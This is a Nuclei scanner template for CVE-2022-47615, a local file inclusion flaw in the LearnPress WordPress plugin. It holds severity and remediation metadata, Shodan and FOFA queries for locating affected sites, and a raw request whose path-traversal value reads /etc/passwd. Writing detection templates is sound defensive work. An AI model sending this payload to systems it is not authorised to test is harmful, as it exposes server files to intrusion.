nuclei-templates/http/cves/2022/CVE-2022-47615.yaml

65 lines
2.2 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2022-47615
info:
name: LearnPress Plugin < 4.2.0 - Local File Inclusion
author: DhiyaneshDK
severity: critical
description: |
Local File Inclusion vulnerability in LearnPress WordPress LMS Plugin <= 4.1.7.3.2 versions.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure.
remediation: |
Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2022-47615
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2022-47615
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47615
cwe-id: CWE-434
epss-score: 0.01795
epss-percentile: 0.88096
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
publicwww-query: "/wp-content/plugins/learnpress"
shodan-query: http.html:/wp-content/plugins/learnpress
fofa-query: body=/wp-content/plugins/learnpress
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress
http:
- raw:
- |
GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- '"status":'
- '"pagination":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100e97aad495112770ba4acb8126e83254747ceb8ff603eaa87925208d4e8d3890b0221008e6cfe1ab83fc37ab9c4670a4add34a9be5189dbb1adb8c487b34f2c345e31ef:922c64590222798bb761d5b6d8e72950